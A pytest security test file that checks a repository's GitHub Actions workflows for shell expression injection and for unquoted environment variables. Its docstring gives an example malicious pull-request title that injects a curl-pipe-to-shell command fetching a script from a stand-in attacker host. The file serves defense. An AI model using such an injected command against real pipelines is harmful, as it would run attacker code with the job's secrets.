"""Every workflow in this repo, checked for expression injection.

`${{ }}` inside a `run:` block is not a variable reference. GitHub performs
textual substitution on the script *before* the shell parses it, so the
expression's value becomes shell **source**. A pull request titled

    "; curl https://evil.invalid/x.sh | sh; #

interpolated into a `run:` block is three commands, and it runs with whatever
token and secrets that job holds.

The safe form is to pass the value through `env:` and dereference it as a shell
variable, because the shell reads a variable's value as data and never as
source.

This is repo-wide rather than per-workflow on purpose: the defect is a property
of a *pattern*, so pinning only the workflows that had it would let the next new
workflow reintroduce it. `adlc.yml` in particular is a reusable workflow called
by consumer repos, so its blast radius is their runners, not ours.
"""

from __future__ import annotations

import re
from pathlib import Path

import pytest
import yaml

REPO_ROOT = Path(__file__).resolve().parents[2]
WORKFLOW_DIR = REPO_ROOT / ".github" / "workflows"

EXPRESSION = re.compile(r"\$\{\{(?P<body>[^}]*)\}\}")

# `github.workspace` and the like are generated by GitHub, not by any user, and
# cannot contain shell metacharacters. Nothing is exempted on the grounds of
# being "probably fine" -- an entry here has to be unable to carry an attacker's
# bytes at all.
ALWAYS_SAFE = frozenset(
    {
        "github.workspace",
        "github.action_path",
        "runner.temp",
        "runner.os",
        "runner.arch",
        "runner.tool_cache",
    }
)


def _workflows() -> list[Path]:
    return sorted(WORKFLOW_DIR.glob("*.yml")) + sorted(WORKFLOW_DIR.glob("*.yaml"))


def _run_steps(path: Path):
    doc = yaml.safe_load(path.read_text(encoding="utf-8")) or {}
    for job_name, job in (doc.get("jobs") or {}).items():
        if not isinstance(job, dict):
            continue
        for index, step in enumerate(job.get("steps") or []):
            if isinstance(step, dict) and step.get("run"):
                name = str(step.get("name") or f"step {index}")
                yield job_name, name, str(step["run"])


def test_there_are_workflows_to_check() -> None:
    """Guard the guard: an empty glob would make everything below vacuous."""
    assert _workflows(), f"no workflows found under {WORKFLOW_DIR}"


@pytest.mark.parametrize("workflow", _workflows(), ids=lambda p: p.name)
def test_no_workflow_interpolates_an_expression_into_a_shell_script(
    workflow: Path,
) -> None:
    offenders: list[str] = []
    for job_name, step_name, body in _run_steps(workflow):
        for match in EXPRESSION.finditer(body):
            expr = match.group("body").strip()
            if expr in ALWAYS_SAFE:
                continue
            offenders.append(f"{job_name} / {step_name}: ${{{{ {expr} }}}}")

    assert not offenders, (
        f"{workflow.name} substitutes expressions into shell source:\n  "
        + "\n  ".join(offenders)
        + "\n\nGitHub interpolates these before the shell parses the script, so "
        "the value becomes commands rather than a string. Pass each through "
        "`env:` and use \"$VAR\" instead."
    )


def test_the_reusable_workflow_keeps_pull_request_text_out_of_the_shell() -> None:
    """The specific instance this test was written for.

    `adlc.yml` is consumed by other repos via `uses:`, so a PR title in any
    consumer repo reached a shell on their runner. Pinned by name as well as by
    the general rule above, because this one has an external blast radius and
    should fail loudly and specifically if it comes back.
    """
    workflow = WORKFLOW_DIR / "adlc.yml"
    assert workflow.exists(), workflow
    for job_name, step_name, body in _run_steps(workflow):
        for field in ("pull_request.title", "pull_request.body", "inputs."):
            assert f"{{{{ github.event.{field}" not in body, (
                f"{job_name} / {step_name} interpolates {field} into the shell"
            )
        assert "{{ inputs." not in body, (
            f"{job_name} / {step_name} interpolates a caller-supplied input into "
            "the shell; a caller can put metacharacters in it"
        )


@pytest.mark.parametrize("workflow", _workflows(), ids=lambda p: p.name)
def test_env_supplied_values_are_quoted_where_they_are_used(
    workflow: Path,
) -> None:
    """Moving a value to `env:` is only half the fix.

    An unquoted `$VAR` is still word-split and glob-expanded by the shell, so a
    value containing a space or a `*` changes the command's argument list. It
    cannot inject a *new* command the way interpolation can, but it can still
    make `adlc build $RUN` run against something other than `$RUN`.
    """
    offenders: list[str] = []
    for job_name, step_name, body in _run_steps(workflow):
        for line in body.splitlines():
            stripped = line.strip()
            if stripped.startswith("#"):
                continue
            for match in re.finditer(r'(?<!")\$(?:\{(\w+)\}|(\w+))(?!")', stripped):
                var = match.group(1) or match.group(2)
                if not var.startswith(("ADLC_", "PR_", "WORKFLOW_")):
                    continue
                start = match.start()
                before = stripped[:start]
                # Inside a double-quoted string is fine; count unescaped quotes.
                if before.count('"') % 2 == 1:
                    continue
                # `VAR="$OTHER"` assignments are handled by the quote check too.
                offenders.append(f"{job_name} / {step_name}: {stripped}")
                break

    assert not offenders, (
        f"{workflow.name} dereferences an env-supplied value unquoted:\n  "
        + "\n  ".join(offenders)
        + '\n\nUse "$VAR" -- an unquoted value is word-split and glob-expanded.'
    )
